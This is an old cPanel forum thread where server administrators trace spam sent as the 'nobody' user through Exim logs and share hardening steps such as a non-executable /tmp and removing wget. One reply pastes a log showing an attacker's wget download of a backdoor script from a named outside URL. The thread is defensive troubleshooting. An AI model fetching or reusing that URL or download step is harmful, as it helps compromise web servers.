The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

"nobody" sending spam from my server

Discussion in 'E-mail Discussions' started by aboleth, Apr 2, 2007.

  1. aboleth

    aboleth Well-Known Member

    Joined:
    Sep 8, 2005
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Hello,

    I have the box checked that is supposed to stop "nobody" from sending mail. Yet, I'm getting all of these messages sent from my server.

    Return-path: <nobody@cpanel01.domain.net>
    Received: from nobody by cpanel01.domain.net with local (Exim 4.63)
    (envelope-from <nobody@cpanel01.acd.net>)
    id 1HYSM9-0002XN-Hv
    for clements@dreamscape.com; Mon, 02 Apr 2007 15:38:21 -0400
    To: clements@dreamscape.com
    Subject: WINNING NOTIFICATION (CONTACT YOUR CLAIMS AGENT)
    From: Barr.Scoth Smith <smithclaims.agent@yahoo.co.uk>
    Reply-To: smithclaims.agent@yahoo.co.uk
    MIME-Version: 1.0
    Content-Type: text/plain
    Content-Transfer-Encoding: 8bit
    Message-Id: <E1HYSM9-0002XN-Hv@cpanel01.domain.net>
    Date: Mon, 02 Apr 2007 15:38:21 -0400

    I tracked down message ID 1HYSM9-0002XN-Hv and it's coming from user ID 99, which is "nobody". Is there something else I should be doing to prevent "nobody" from sending mail?

    When I do:

    grep 99 /etc/passwd

    It returns:

    nobody:x:99:99:Nobody:/:/sbin/nologin

    I'm not sure if this is right or not, Probably a formmail exploit or something? Any help or suggestions would be greatly appreciated. I think i'm going to install mod-secure, as it has had good reviews on the forums form what I have seen, anyone know where I can find some additional info on it?


    Thanks,

    Nick
     
  2. aboleth

    aboleth Well-Known Member

    Joined:
    Sep 8, 2005
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    BTW, It looks like these mails aren't actually going out, and then "nobody" user is not actually allowed to send. However, I'm concerned that someone is sending out a lot of mail as nobody, and I'm getting spoammed with the return messages (nobody's bounces are getting forwarded to me). I'm wondering how to track this down further or find out what might be attempting to send these messages. The messages are all abvious spam.

    Thanks in advance for any help you may be able to provide.

    Nick
     
  3. arhs

    arhs Well-Known Member

    Joined:
    Jul 4, 2003
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
  4. aboleth

    aboleth Well-Known Member

    Joined:
    Sep 8, 2005
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Awesome, this article has several things, I Haven't tried yet, I'll let you know how it goes, thanks!
     
  5. aboleth

    aboleth Well-Known Member

    Joined:
    Sep 8, 2005
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Looks like the spam is originating from the /tmp directory.... Can't make heads or tails of it from actually going to that directory. This is much further than I was, at least I have a clue what's sending it. Anyone have any ideas as to what I should be looking for now?


    Thanks!


    Nick
     
  6. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    You should have extended logging enabled for Exim so that you can determine
    the directory where the mail sending script originated.

    Assuming you are right about it being /tmp then that means you need to
    edit your /etc/fstab and make your /tmp mounted as non-executable
    else you got a lot more to worry about than spam scripts running.
     
  7. aboleth

    aboleth Well-Known Member

    Joined:
    Sep 8, 2005
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Thanks Spiral. My /tmp is mounted as non executable. This is something I fixed with chirpy's "Configserver and Security" about 48 hours ago. Extended logging is showing the messages originating from "cwd= /tmp". Perhaps I'm not looking at the right thing? Any addition help is of course appreciated :)

    Thanks,
    Nick
     
  8. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    I'd be glad to take a look see
     
  9. aboleth

    aboleth Well-Known Member

    Joined:
    Sep 8, 2005
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    I've enabled some extremely extended logging on exim...

    Ran the following command...

    tail -f /var/log/exim_mainlog |grep /tmp

    Got the following output.... it goes on and on...



    2007-04-03 19:13:24 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:30 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:41 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:50 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:13:59 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:03 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:03 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:04 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:13 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:20 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:21 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:23 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:39 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:40 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:14:43 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:00 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:00 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:02 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:18 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:18 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:22 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:23 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:23 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:24 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:33 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:39 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:40 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:42 cwd=/tmp 2 args: /usr/sbin/sendmail -bS
    2007-04-03 19:15:43 cwd=/tmp 2 args: /usr/sbin/sendmail -bS


    Does that help?

    Thanks!

    Nick
     
  10. aboleth

    aboleth Well-Known Member

    Joined:
    Sep 8, 2005
    Messages:
    50
    Likes Received:
    0
    Trophy Points:
    6
    Ok, partially due to my on idiocy and not looking at the log files correctly, I totally missed the directory that as sending the mail. I found the culprit and have suspended their account. Mails stopped, server load is now much much lower.

    I would like to thank those who helped. I really appreciate your time, and I'll be glad to help when I see questions I'm qualified to answer :)


    I have come up with the following math equasion:

    (Nick + forums.cpanel.net)x(literacy + research) > spammers

    Thanks again,

    Nick
     
  11. gonz0

    gonz0 Member

    Joined:
    Jul 2, 2004
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    I have the same problem and usually the exploit was uploaded to /var/tmp directory.

    But how I can find who and how uploaded this sh**t ? Is there any chance to catch it ?

    In /usr/local/apache/logs/ at error_log file I have sth like this:

    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed

    100 1204 100 1204 0 0 902 0 0:00:01 0:00:01 --:--:-- 902
    100 1204 100 1204 0 0 902 0 0:00:01 0:00:01 --:--:-- 0
    --18:58:30-- http://thewayradio.com/xplrooti/back.txt
    Resolving thewayradio.com... 203.146.249.134
    Connecting to thewayradio.com|203.146.249.134|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1204 (1.2K) [text/plain]
    Saving to: `back.txt.1'

    0K . 100% 88.3M=0s

    18:58:32 (88.3 MB/s) - `back.txt.1' saved [1204/1204]

    sh: fetch: command not found


    It is sending spam via exim.
     
    #11 gonz0, May 10, 2007
    Last edited: May 10, 2007
  12. DaveUsedToWorkHere

    DaveUsedToWorkHere Well-Known Member

    Joined:
    Dec 28, 2001
    Messages:
    689
    Likes Received:
    1
    Trophy Points:
    18
  13. gonz0

    gonz0 Member

    Joined:
    Jul 2, 2004
    Messages:
    19
    Likes Received:
    0
    Trophy Points:
    1
    rmoved wget thx.

    also added in Tweak Setting -> Prevent the user "nobody" from sending out mail to remote addresses (PHP and CGI scripts generally run as nobody if you are not using PHPSuexec and Suexec respectively.)

    now must find how he loaded this sh*t
     
Loading...

Share This Page